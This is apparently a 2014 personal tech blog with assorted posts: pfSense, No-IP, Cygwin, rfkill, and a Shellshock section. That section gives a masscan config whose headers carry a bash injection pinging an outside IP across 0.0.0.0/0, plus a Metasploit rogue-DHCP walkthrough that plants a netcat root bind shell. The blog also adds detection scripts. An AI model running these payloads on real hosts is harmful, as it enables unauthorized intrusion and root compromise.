Friday, October 31, 2014

Port forwarding on pfSense

pfSense version 1.2.3

  1. Go to the Firewall menu, select NAT, then click on the Port Forward tab.
  2. Click on the + icon at the top or bottom of the screen.
  3. Choose the interface for the port forward (usually WAN) and, if needed, pick a virtual IP address from the External Address drop-down.
  4. Enter the forwarded port in the External Port range box(es).
  5. Enter the internal IP address you want that port sent to in the NAT IP box.
  6. Fill in a local port if it differs from the external port.
  7. Check the "Auto-add a firewall rule" checkbox. Without the matching pass rule the NAT entry exists but the WAN still drops the traffic. Note that the auto-added rule lets any source address reach that port, so only forward ports you actually need exposed.
  8. Click Save, which returns you to the Port Forward NAT screen listing all the NAT entries.
  9. Finally, click Apply Changes, wait a few seconds and test from a host outside the WAN (not from the LAN side).

Ref: https://doc.pfsense.org/index.php/How_can_I_forward_ports_with_pfSense

How to Install the Dynamic Update Client on Linux


Once you have a No-IP account, this is needed if your ISP does not give you a static IP.
This guide walks you through the installation and setup of the Dynamic Update Client (DUC) on a computer running Linux. If you are using Ubuntu or Debian, check the No-IP support site for guides on their specific setup.
Installing the Client
The commands below should be executed from a terminal window after logging in as the "root" user. You can become root from the command line by entering "sudo su -" followed by your own password (sudo asks for the invoking user's password, not root's).
Note: If you do not have root on the machine, prefix steps 5 and 6 with "sudo". Steps 1 to 4 also need write access to /usr/local/src, so use a directory you own if that fails.
  1. cd /usr/local/src
  2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
  3. tar xzf noip-duc-linux.tar.gz
  4. cd no-ip-2.1.9
  5. make
  6. make install
If you get "make not found" or "missing gcc" then you do not have the compiler tools on your machine. You will need to install these (gcc and make) in order to proceed. Note that step 2 fetches the tarball over plain HTTP, so nothing on the wire authenticates what you are about to compile and install as root; compare it against a checksum from a trusted source before running make install.
To Configure the Client
As root again (or with sudo) issue the command below:
  • /usr/local/bin/noip2 -C   (dash capital C; this creates the default config file)
You will then be prompted for your No-IP username and password, as well as which hostnames you wish to update. Be careful: one of the questions is "Do you wish to update ALL hosts". Answered incorrectly, this can affect hostnames in your account that point at other locations. The credentials are stored in the configuration file noip2 writes (under /usr/local/etc by default), so keep that file readable by root only.
Now that the client is installed and configured, you just need to launch it. Issue this final command to launch the client in the background:
  • /usr/local/bin/noip2
Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup; this varies with the Linux distribution you are running.
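Because the tarball arrives over plain HTTP and is then built and installed as root, the one check worth adding to the steps above is a digest comparison before make. The script below is an added example, not part of the No-IP guide: it computes SHA-256 with whichever tool the box has and gates the guide's build steps on a match. The expected digest is an input you must obtain from a trusted channel; this example deliberately hard-codes none.

```shell
#!/bin/sh
# Added example (not from the No-IP guide): verify a downloaded tarball
# against a SHA-256 value obtained out of band before running make/make install.
# The guide fetches noip-duc-linux.tar.gz over plain HTTP, so nothing on the
# wire authenticates it; a known-good digest is the minimum check.

# sha256_of FILE: print the hex SHA-256 digest using whichever tool is present.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | awk '{ print $1 }'
    elif command -v openssl >/dev/null 2>&1; then
        openssl dgst -sha256 "$1" | awk '{ print $NF }'
    else
        echo "no SHA-256 tool found" >&2
        return 2
    fi
}

# verify_sha256 FILE EXPECTED: return 0 only if the digests match
# (hex case is ignored); on mismatch, explain on stderr and return 1.
verify_sha256() {
    actual=$(sha256_of "$1") || return 2
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "checksum mismatch for $1: got $actual, expected $expected" >&2
    return 1
}

# install_duc_verified TARBALL EXPECTED_SHA256: the guide's build steps, gated
# on the checksum. EXPECTED_SHA256 must come from a trusted channel, not from
# the same HTTP download. Runs in a subshell so the cd does not leak.
install_duc_verified() {
    verify_sha256 "$1" "$2" || return 1
    ( tar xzf "$1" && cd no-ip-2.1.9 && make && make install )
}
```

Usage: `install_duc_verified /usr/local/src/noip-duc-linux.tar.gz <digest>`; a mismatch stops before anything is unpacked.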
REf: http://www.noip.com/support/knowledgebase/installing-the-linux-dynamic-update-client/

Thursday, October 30, 2014

How to install packages in Cygwin

While I've known and used Cygwin before, I never really leveraged it in a pen-test until today.
After installing Cygwin, however, it needs to be updated to add the packages you need for the task at hand. It took me a few minutes to figure out how to do this, so here are the instructions that worked.

1) Get the Cygwin setup.exe from http://cygwin.com/ and run it again (the same installer is used to add packages).
2) Click through the preferences until you reach the "Select Packages" window.
3) Click (+) for Net.
4) Click the entry for curl (make sure you select the checkbox for the Binary).
5) Install.
6) Open a Cygwin window and type curl.exe (it should be available now).
The installer also accepts -q -P curl on the command line for an unattended install of a named package, which is handier when you are scripting a box.





Ref: http://stackoverflow.com/questions/3647569/how-do-i-install-curl-on-cygwin

Wednesday, October 29, 2014

Linux WiFi: operation not possible due to RF-kill

Often when I bring my laptop out of hibernation or suspend I am unable to enable WiFi. This issue has been reported to have begun after an update just before Christmas 2010. The problem seems to be a bug in a kernel module which prevents rfkill's soft and hard block from syncing correctly.

In practice that means you can press your laptop's WiFi button as often as you want; it doesn't change anything. Your wireless adapter will always appear as disabled. If you try to start the wireless interface manually you get the following error message:
sk@ubuntu:~$ sudo ifconfig wlan0 up
SIOCSIFFLAGS: Operation not possible due to RF-kill
If you run rfkill list all you should get output similar to this:
sk@ubuntu:~$ sudo rfkill list all
0: hp-wifi: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
1: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
Depending on the state of your WiFi button, Hard blocked will be either yes or no. Press the WiFi button and run rfkill list all again to make sure the value for Hard blocked changes. A hard block comes from the physical switch and cannot be cleared from software; only the soft block can.

The actual problem is that the Soft blocked value is always set to yes, because for some reason the syncing between the hardware block and the software block doesn't work as it should. To override this, run rfkill unblock wifi (as root) and it should work again. Double-check by entering rfkill list all again and make sure it looks like this, with all values set to no:
sk@ubuntu:~$ sudo rfkill list all
0: hp-wifi: Wireless LAN
    Soft blocked: no
    Hard blocked: no
1: phy0: Wireless LAN
    Soft blocked: no
    Hard blocked: no
If you then run ifconfig wlan0 up (or enable wireless via your desktop's network manager) you should be able to connect to a wireless network again without further issues.
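To make the soft/hard distinction above mechanical, here is an added example (not part of the original post) that parses rfkill list all output, reports which devices are blocked and how, and prints the rfkill commands that clear the soft blocks while flagging hard blocks that need the physical switch. The sample output embedded in it is constructed to mirror the listings in this post; on a real machine pipe the live rfkill output in instead.

```shell
#!/bin/sh
# Added example, not part of the original post: parse the output of
# `rfkill list all`, report which devices are soft- or hard-blocked, and emit
# the rfkill commands that clear the soft block. The sample output below is
# constructed to mirror the post; on a real system pipe `rfkill list all` in.

SAMPLE_RFKILL='0: hp-wifi: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
1: phy0: Wireless LAN
    Soft blocked: yes
    Hard blocked: no
2: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: yes'

# blocked_ids KIND [TYPE]: read rfkill output on stdin and print the index of
# every device of TYPE (default "Wireless LAN") whose KIND ("Soft" or "Hard")
# block is set.
blocked_ids() {
    kind="$1"
    want="${2:-Wireless LAN}"
    awk -v kind="$kind" -v want="$want" '
        /^[0-9]+:/ {                        # header line: "<idx>: <name>: <type>"
            idx = $1; sub(":", "", idx)
            type = $0; sub(/^[0-9]+: [^:]*: /, "", type)
        }
        $1 == kind && $2 == "blocked:" && $3 == "yes" && type == want { print idx }
    '
}

# unblock_plan: for each wireless device, print the command that clears a soft
# block, or a note when the block is hard (a physical switch that software
# cannot override). Review the plan, then run the rfkill lines as root.
unblock_plan() {
    input=$(cat)
    printf '%s\n' "$input" | blocked_ids Hard | while read -r id; do
        printf '# device %s is hard blocked: toggle the physical WiFi switch\n' "$id"
    done
    printf '%s\n' "$input" | blocked_ids Soft | while read -r id; do
        printf 'rfkill unblock %s\n' "$id"
    done
}
```

Usage on a live system: `rfkill list all | unblock_plan | sudo sh`. rfkill accepts either the device index (as emitted here) or a type name, so `rfkill unblock wifi` from the post clears all wireless soft blocks in one go.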

The configuration, which I've been using:
  • Lenovo B575
  • Atheros ath9k AR9285 Wireless Network Adapter
  • Ubuntu 14.04.1 LTS
It's reported that turning off the WiFi button during the boot process and switching it on again once the system is up and running may correct the issue. This didn't work for me, as the button was still not functional. In the past I simply logged off and back on, which allowed me to enable WiFi with the button. However, this was not the case today. What finally worked:

  • suspend the system to RAM (either by hitting the Suspend key or by using the Suspend entry in the logout menu at the right of the upper panel)
  • wait a few seconds
  • press the power button to bring the system back up
Afterwards, the output of 'rfkill list all' finally shows:

0: phy0: Wireless LAN
    Soft blocked: no
    Hard blocked: no
1: asus-wlan: Wireless LAN
    Soft blocked: no
    Hard blocked: no

NetworkManager will then activate WiFi and should offer access points to connect to.

It seems that the system expects the hard block to be off. This is still a bug, but it could explain why the soft block no longer synced with the hard block.

service apache2 status

"service apache2 status" shows whether the Apache server is running.

Similarly, for the ISC DHCP server:

dhcpd -f

runs dhcpd in the foreground, so startup errors are printed to the terminal instead of being hidden behind the init script.

Bash 'shellshock' scan of the Internet

This masscan configuration can be used to find hosts vulnerable to Shellshock (CVE-2014-6271).
Thanks, Mr. Graham.



The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74


The last three options (the http-header lines) don't quite work in the release due to a bug, so the fix has to go into the code; see the link at the top of this page. The masscan file involved, proto-http.c, is reproduced below. Two things to change before running this yourself: the ping target 209.126.230.74 is the address from the original post, so point it at a host you control and watch for incoming ICMP there (each echo request identifies a host that ran the payload); and only scan ranges you are authorized to test, with masscan's exclude list populated, since target-ip = 0.0.0.0/0 covers the whole IPv4 Internet.


#include "proto-http.h"
#include "proto-banner1.h"
#include "smack.h"
#include "unusedparm.h"
#include "string_s.h"
#include "masscan-app.h"
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

enum {
    HTTPFIELD_INCOMPLETE,
    HTTPFIELD_SERVER,
    HTTPFIELD_CONTENT_LENGTH,
    HTTPFIELD_CONTENT_TYPE,
    HTTPFIELD_VIA,
    HTTPFIELD_LOCATION,
    HTTPFIELD_UNKNOWN,
    HTTPFIELD_NEWLINE,
};
static struct Patterns http_fields[] = {
    {"Server:",          7, HTTPFIELD_SERVER,           SMACK_ANCHOR_BEGIN},
    //{"Content-Length:", 15, HTTPFIELD_CONTENT_LENGTH,   SMACK_ANCHOR_BEGIN},
    //{"Content-Type:",   13, HTTPFIELD_CONTENT_TYPE,     SMACK_ANCHOR_BEGIN},
    {"Via:",             4, HTTPFIELD_VIA,              SMACK_ANCHOR_BEGIN},
    {"Location:",        9, HTTPFIELD_LOCATION,         SMACK_ANCHOR_BEGIN},
    {":",                1, HTTPFIELD_UNKNOWN, 0},
    {"\n",               1, HTTPFIELD_NEWLINE, 0},
    {0,0,0,0}
};
enum {
    HTML_INCOMPLETE,
    HTML_TITLE,
    HTML_UNKNOWN,
};
static struct Patterns html_fields[] = {
    {"<TiTle",          6, HTML_TITLE, 0},
    {0,0,0,0}
};

extern struct ProtocolParserStream banner_http;



/***************************************************************************
 ***************************************************************************/
unsigned
http_change_field(unsigned char **inout_header, unsigned header_length,
                    const char *field_name,
                    const unsigned char *field_value, unsigned field_value_len)
{
    unsigned char *hdr1 = *inout_header;
    unsigned char *hdr2;
    unsigned i;
    unsigned is_newline_seen = 0;
    unsigned field_name_len = (unsigned)strlen(field_name);

    hdr2 = (unsigned char *)malloc(header_length + field_value_len + 1 + 2);

    memcpy(hdr2, hdr1, header_length);

    /* Remove the previous header and remember the location in the header
     * where it was located */
    for (i=0; i<header_length; i++) {
        if (hdr2[i] == '\r')
            continue;
        if (hdr2[i] == '\n') {
            if (is_newline_seen) {
                /* We've reached the end of header without seeing
                 * the field. Therefore, create space right here
                 * for it. */
                while (hdr2[i-1] == '\r')
                    i--;
                break;
            } else if (memcasecmp(&hdr2[i+1], field_name, field_name_len) == 0) {
                unsigned j;
                i++; /* skip previous newline */
                for (j=i; j<header_length && hdr2[j] != '\n'; j++)
                    ;
                if (j < header_length && hdr2[j] == '\n')
                    j++;
                memmove(    &hdr2[i],
                            &hdr2[j],
                            header_length - j);
                header_length -= (j - i);
                hdr2[header_length] = '\0';
                break;
            }
        }
    }

    /* Insert the new header at this location */
    memmove(    &hdr2[i + field_name_len + field_value_len + 1 + 2],
                &hdr2[i],
                header_length - i);
    memcpy( &hdr2[i],
            field_name,
            field_name_len);
    memcpy( &hdr2[i + field_name_len],
            " ",
            1);
    memcpy( &hdr2[i + field_name_len + 1],
            field_value,
            field_value_len);
    memcpy( &hdr2[i + field_name_len + 1 + field_value_len],
            "\r\n",
            2);

    header_length += field_name_len + 1 + field_value_len + 2;

    free(hdr1);
    *inout_header = hdr2;
    return header_length;
}

/***************************************************************************
 ***************************************************************************/
static const char
http_hello[] =      "GET / HTTP/1.0\r\n"
                    "User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)\r\n"
                    "Accept: */*\r\n"
                    //"Connection: Keep-Alive\r\n"
                    //"Content-Length: 0\r\n"
                    "\r\n";


/*****************************************************************************
 *****************************************************************************/
void
field_name(struct BannerOutput *banout, size_t id,
           struct Patterns *xhttp_fields);
void
field_name(struct BannerOutput *banout, size_t id,
           struct Patterns *xhttp_fields)
{
    unsigned i;
    if (id == HTTPFIELD_INCOMPLETE)
        return;
    if (id == HTTPFIELD_UNKNOWN)
        return;
    if (id == HTTPFIELD_NEWLINE)
        return;
    for (i=0; xhttp_fields[i].pattern; i++) {
        if (xhttp_fields[i].id == id) {
            banout_newline(banout, PROTO_HTTP);
            banout_append(  banout, PROTO_HTTP,
                            (const unsigned char*)xhttp_fields[i].pattern
                                + ((xhttp_fields[i].pattern[0]=='<')?1:0), /* bah. hack. ugly. */
                            xhttp_fields[i].pattern_length
                                - ((xhttp_fields[i].pattern[0]=='<')?1:0) /* bah. hack. ugly. */
                          );
            return;
        }
    }
}

/*****************************************************************************
 * Initialize some stuff that's part of the HTTP state-machine-parser.
 *****************************************************************************/
static void *
http_init(struct Banner1 *b)
{
    unsigned i;

    /*
     * These match HTTP Header-Field: names
     */
    b->http_fields = smack_create("http", SMACK_CASE_INSENSITIVE);
    for (i=0; http_fields[i].pattern; i++)
        smack_add_pattern(
                          b->http_fields,
                          http_fields[i].pattern,
                          http_fields[i].pattern_length,
                          http_fields[i].id,
                          http_fields[i].is_anchored);
    smack_compile(b->http_fields);

    /*
     * These match HTML <tag names
     */
    b->html_fields = smack_create("html", SMACK_CASE_INSENSITIVE);
    for (i=0; html_fields[i].pattern; i++)
        smack_add_pattern(
                          b->html_fields,
                          html_fields[i].pattern,
                          html_fields[i].pattern_length,
                          html_fields[i].id,
                          html_fields[i].is_anchored);
    smack_compile(b->html_fields);

    banner_http.hello = (unsigned char*)malloc(banner_http.hello_length);
    memcpy((char*)banner_http.hello, http_hello, banner_http.hello_length);

    return b->http_fields;
}

/***************************************************************************
 * BIZARRE CODE ALERT!
 *
 * This uses a "byte-by-byte state-machine" to parse the response HTTP
 * header. This is standard practice for high-performance network
 * devices, but is probably unfamiliar to the average network engineer.
 *
 * The way this works is that each byte of input causes a transition to
 * the next state. That means we can parse the response from a server
 * without having to buffer packets. The server can send the response
 * one byte at a time (one packet for each byte) or in one entire packet.
 * Either way, we don't. We don't need to buffer the entire response
 * header waiting for the final packet to arrive, but handle each packet
 * individually.
 *
 * This is especially useful with our custom TCP stack, which simply
 * rejects out-of-order packets.
 ***************************************************************************/
static void
http_parse(
        const struct Banner1 *banner1,
        void *banner1_private,
        struct ProtocolState *pstate,
        const unsigned char *px, size_t length,
        struct BannerOutput *banout,
        struct InteractiveData *more)
{
    unsigned state = pstate->state;
    unsigned i;
    unsigned state2;
    unsigned log_begin = 0;
    unsigned log_end = 0;
    size_t id;
    enum {
        FIELD_START = 9,
        FIELD_NAME,
        FIELD_COLON,
        FIELD_VALUE,
        CONTENT,
        CONTENT_TAG,
        CONTENT_FIELD
    };

    UNUSEDPARM(banner1_private);
    UNUSEDPARM(more);

    state2 = (state>>16) & 0xFFFF;
    id = (state>>8) & 0xFF;
    state = (state>>0) & 0xFF;

    for (i=0; i<length; i++)
    switch (state) {
    case 0: case 1: case 2: case 3: case 4:
        if (toupper(px[i]) != "HTTP/"[state])
            state = STATE_DONE;
        else
            state++;
        break;
    case 5:
        if (px[i] == '.')
            state++;
        else if (!isdigit(px[i]))
            state = STATE_DONE;
        break;
    case 6:
        if (isspace(px[i]))
            state++;
        else if (!isdigit(px[i]))
            state = STATE_DONE;
        break;
    case 7:
        /* TODO: look for 1xx response code */
        if (px[i] == '\n')
            state = FIELD_START;
        break;
    case FIELD_START:
        if (px[i] == '\r')
            break;
        else if (px[i] == '\n') {
            state2 = 0;
            state = CONTENT;
            log_end = i;
            banout_append(banout, PROTO_HTTP, px+log_begin, log_end-log_begin);
            log_begin = log_end;
            break;
        } else {
            state2 = 0;
            state = FIELD_NAME;
            /* drop down */
        }

    case FIELD_NAME:
        if (px[i] == '\r')
            break;
        id = smack_search_next(
                        banner1->http_fields,
                        &state2,
                        px, &i, (unsigned)length);
        i--;
        if (id == HTTPFIELD_NEWLINE) {
            state2 = 0;
            state = FIELD_START;
        } else if (id == SMACK_NOT_FOUND)
            ; /* continue here */
        else if (id == HTTPFIELD_UNKNOWN) {
            /* Oops, at this point, both ":" and "Server:" will match.
             * Therefore, we need to make sure ":" was found, and not
             * a known field like "Server:" */
            size_t id2;

            id2 = smack_next_match(banner1->http_fields, &state2);
            if (id2 != SMACK_NOT_FOUND)
                id = id2;

            state = FIELD_COLON;
        } else
            state = FIELD_COLON;
        break;
    case FIELD_COLON:
        if (px[i] == '\n') {
            state = FIELD_START;
            break;
        } else if (isspace(px[i])) {
            break;
        } else {
            //field_name(banout, id, http_fields);
            state = FIELD_VALUE;
            /* drop down */
        }

    case FIELD_VALUE:
        if (px[i] == '\r')
            break;
        else if (px[i] == '\n') {
            state = FIELD_START;
            break;
        }
        switch (id) {
        case HTTPFIELD_SERVER:
        case HTTPFIELD_LOCATION:
        case HTTPFIELD_VIA:
            //banner_append(&px[i], 1, banout);
            break;
        case HTTPFIELD_CONTENT_LENGTH:
                if (isdigit(px[i]&0xFF)) {
                    ; /*todo: add content length parsing */
                } else {
                    id = 0;
                }
            break;
        }
        break;
    case CONTENT:
        {
            unsigned next = i;

            id = smack_search_next(
                                   banner1->html_fields,
                                   &state2,
                                   px, &next, (unsigned)length);

            if (banner1->is_capture_html) {
                banout_append(banout, PROTO_HTML_FULL, &px[i], next-i);
            }

            if (id != SMACK_NOT_FOUND) {
                state = CONTENT_TAG;
            }

            i = next - 1;
        }
        break;
    case CONTENT_TAG:
        for (; i<length; i++) {
            if (banner1->is_capture_html) {
                banout_append_char(banout, PROTO_HTML_FULL, px[i]);
            }

            if (px[i] == '>') {
                state = CONTENT_FIELD;
                break;
            }
        }
        break;
    case CONTENT_FIELD:
        if (banner1->is_capture_html) {
            banout_append_char(banout, PROTO_HTML_FULL, px[i]);
        }
        if (px[i] == '<')
            state = CONTENT;
        else {
            banout_append_char(banout, PROTO_HTML_TITLE, px[i]);
        }
        break;
    case STATE_DONE:
    default:
        i = (unsigned)length;
        break;
    }

    if (log_end == 0 && state < CONTENT)
        log_end = i;
    if (log_begin < log_end)
        banout_append(banout, PROTO_HTTP, px + log_begin, log_end-log_begin);



    if (state == STATE_DONE)
        pstate->state = state;
    else
        pstate->state = (state2 & 0xFFFF) << 16
                | (id & 0xFF) << 8
                | (state & 0xFF);
}


/***************************************************************************
 ***************************************************************************/
static int
http_selftest(void)
{
    return 0;
}

/***************************************************************************
 ***************************************************************************/
struct ProtocolParserStream banner_http = {
    "http", 80, http_hello, sizeof(http_hello)-1, 0,
    http_selftest,
    http_init,
    http_parse,
};
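The scan above is visible from the other side: a probe carries a bash function definition ("() {") in a request header, and anything that logs headers records it. The script below is an added example, not part of Graham's post or of masscan; it assumes an Apache/nginx combined-format access log, in which only the Referer and User-Agent headers are recorded (the Cookie and Host payloads masscan also sends are not in a combined log and need a proxy or packet capture). The log lines are constructed for the example, with the page's own user-agent string.

```shell
#!/bin/sh
# Added example (not from Graham's post or masscan): find Shellshock probes in
# a combined-format web access log. A probe carries "() {" in a header; the
# combined format logs Referer and User-Agent, so those are what we can see.
# The log lines below are constructed for this example.

SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:10:11:12 +0000] "GET / HTTP/1.0" 200 612 "() { :; }; ping -c 3 198.51.100.9" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
198.51.100.23 - - [25/Sep/2014:10:12:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:12:40 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "-" "() { :;}; /bin/bash -c \"id\""
192.0.2.55 - - [25/Sep/2014:10:13:13 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.38.0"'

# shellshock_hits: for every request whose logged headers contain the bash
# function-definition marker, print "<client ip> <request path>".
# The marker is "()" followed by optional spaces and "{".
shellshock_hits() {
    grep -E '\(\) *\{' | awk '{ print $1, $7 }'
}

# shellshock_sources: probing client IPs with hit counts, busiest first.
shellshock_sources() {
    shellshock_hits | awk '{ print $1 }' | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# callback_hosts: IPv4 addresses named inside the payloads themselves (the
# scanner's ping/listener target), which is where a hit would have phoned home.
callback_hosts() {
    grep -oE '\(\) *\{.*' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u
}
```

Usage: `shellshock_sources < /var/log/apache2/access.log`. A 5xx on a /cgi-bin/ path with a probe in the headers is the line to chase first: it means a CGI script ran and something in it failed, which is consistent with the payload having reached a shell.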





Shellshock Bash Vuln - How To

Found Here: http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/


Step 1: Start Metasploit

Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following.

[Image: uCronQr.png?1]

Step 2: Update Metasploit

Since this is a new Metasploit module, it is not in the Metasploit Framework that shipped with your Kali download, so we need to update Metasploit. Open a terminal and type:

kali > msfupdate

[Image: bJmKgN4.png?1]

This might take a while, so be patient.
Step 3: Find the Exploit

Now that we have updated Metasploit and presumably downloaded the new Shellshock modules, let's find the exploit. In the Metasploit console, type:

msf > search shellshock

[Image: 1nmXbDC.png?1]

As we can see, Metasploit found the auxiliary module for attacking DHCP clients through the Shellshock vulnerability. The vector works because dhclient hands lease options to its dhclient-script through environment variables, and that script is run by bash, which is exactly where the injected function definition lands.

Let's now load that module by typing:

msf > use auxiliary/server/dhclient/dhclient_bash_env

Now, let's type info to get more information on this module.

msf > info

[Image: e2NsiXq.png?1]

We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters

Now, let's show options.

msf > show options

[Image: 5O1m2Ut.png?1]

First, set the DHCP server IP (the attacking Kali host). This is the SRVHOST parameter.

msf > set SRVHOST 192.168.131.254

[Image: ZD8eR1H.png?1]

Next, set the command we want to inject through bash. Although this module comes with a netcat command by default, let's change it slightly to a command I have found gives better and more reliable results:

msf > set CMD /bin/nc -l -p6996 -e /bin/sh

[Image: FQfpfmN.png?1]

Lastly, set the NETMASK.

msf > set NETMASK 255.255.255.0

[Image: wb092wT.png?1]

Finally, type "exploit" (or "run", since this is an auxiliary module) to start it.

msf > exploit

[Image: VaefWio.png?1]

When we do so, we simply get the message "Auxiliary module execution completed." Here that means the rogue DHCP server is up and will answer the next lease request with the payload. When a vulnerable client on that segment requests or renews a lease, our CMD runs as root (dhclient runs with root privileges) and sets up a netcat listener on port 6996 handing a shell to whoever connects.
Step 5: Connect to the Exploited System

Now that netcat is listening on the vulnerable system, we should be able to connect to it remotely with root privileges. We would then own that machine.

For demonstration purposes, connect to that system from a Windows machine by connecting to the netcat listener. Open a command prompt on the Windows system and type:

C:\> nc 192.168.131.129 6996

It will return a blank line. Type "ifconfig":

ifconfig

[Image: PyQg2Sc.png?1]

It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, type "whoami":

whoami

[Image: fxszA57.png?1]

In this screenshot you can see that we have not only accessed the system remotely, but have root privileges. We own this system.
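The walkthrough above gives no way to confirm, on a client you are authorized to test, why a DHCP option ends up executed: the two facts that have to hold are that dhclient-script is parsed by bash and that this bash still imports functions from the environment. The script below is an added example, not from the Null Byte article or the Metasploit module. shellshock_check runs the same shape of probe the module delivers, but locally against a shell you name, using an environment variable named the way dhclient names lease options (new_domain_name; the exact option the module abuses is not stated on this page). script_interpreter reads a script's shebang so you can see which shell dhclient-script uses on your system.

```shell
#!/bin/sh
# Added example, not from the Null Byte article or the Metasploit module.
# dhclient hands every lease option to dhclient-script through environment
# variables (new_domain_name, new_routers, ...), and on many distributions
# that script runs under bash. Before the Shellshock fixes, bash turned any
# exported value of the form "() { :; }; <cmd>" into a function definition and
# ran <cmd> on startup. These checks confirm both halves on a host you are
# authorized to test: which shell parses the options, and whether that shell
# still imports functions.

# shellshock_check [SHELL]: prints "vulnerable" if SHELL runs the trailing
# command while importing the function, "patched" if not, "missing" if SHELL
# is not installed. The variable name mirrors what dhclient exports; the value
# is the same shape of probe the module delivers over DHCP.
shellshock_check() {
    shell="${1:-bash}"
    path=$(command -v "$shell" 2>/dev/null) || path=""
    if [ -z "$path" ] || [ ! -x "$path" ]; then
        echo missing
        return 2
    fi
    out=$(new_domain_name='() { :; }; echo INJECTED' "$path" -c 'true' 2>/dev/null) || out=""
    case "$out" in
        *INJECTED*) echo vulnerable; return 1 ;;
        *)          echo patched;    return 0 ;;
    esac
}

# script_interpreter FILE: print the interpreter on FILE's shebang line, or
# "none". Run it on /sbin/dhclient-script to see which shell parses the lease
# options on your system.
script_interpreter() {
    interp=$(sed -n '1s/^#![[:space:]]*//p' "$1" 2>/dev/null | awk '{ print $1 }')
    if [ -n "$interp" ]; then
        printf '%s\n' "$interp"
    else
        echo none
    fi
}
```

Usage: `shellshock_check bash; script_interpreter /sbin/dhclient-script`. A client is exposed to this module only when the first prints "vulnerable" and the second names a bash that is the one you just checked; a "patched" bash is the fix, and no amount of DHCP filtering substitutes for it.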

Security Tools



Here is a compilation of forensic and penetration testing tools for applications, networks, and websites.


While most professionals end up writing their own tools for a given task, this is a good starting point. These are some of the most frequently used in my toolbox.

The learning curve on some of these can be steep, so do the research. Results come with proper configuration and the correct filters or switches.

[Image: sitelogo.png]


Nmap is a very versatile scanner (IPv6 included) that lets you gather a large amount of information about a target quickly, including open ports and much more.
Nmap supports a large number of scanning techniques, such as: UDP, TCP connect(), TCP SYN (half open), FTP proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP protocol, and Null scan.


[Image: IXcgJ.png]


Wireshark is a very powerful network troubleshooting and analysis tool. It can capture and dissect data from a live network and supports hundreds of protocols and media formats.


[Image: logooxid.png]

Cain & Abel

Cain & Abel is a Windows-only tool that bundles password recovery, password cracking, network sniffing, and protocol routing/analysis functions. Being Windows-only is unusual among penetration testing and forensic tools, most of which target Linux.


[Image: logo.png]

Metasploit is a very powerful exploitation framework, used often in penetration tests; it has a clean interface and easily gathers the information you seek.


[Image: HkR4k.png]

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)





The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.


[Image: 7diZx.png]


Havij is the most common and widely known testing tool for SQL injection and several other web-based injection types. It provides site scanning, admin page look-up, password hash cracking, and database retrieval, and makes finding and exploiting vulnerable websites very easy.

[Image: logo_small.png]

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website)




Kali is a widely popular bootable live Linux distribution, the successor to BackTrack. It offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking: VoIP networks, websites and more. Its interface and design provide an easy-to-use layout.


[Image: YLv2g.png]

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org)




EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.)



[Image: JuEqY.png]


Helix is a live bootable Ubuntu-based CD that contains a multitude of forensic tools for cellphones, computers, file systems and images, behind a friendly and easy-to-use interface.

[Image: L4fYp.png]

Acunetix is a strong and very popular website security tool. It provides many tests for injection flaws in your own web applications (or others you are authorized to test). Acunetix WVS automatically checks web applications for SQL injection, XSS and other web vulnerabilities.


[Image: 6GXN9.png]


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 


Tuesday, October 28, 2014

What is Malware?

What's the difference between malware and a virus?


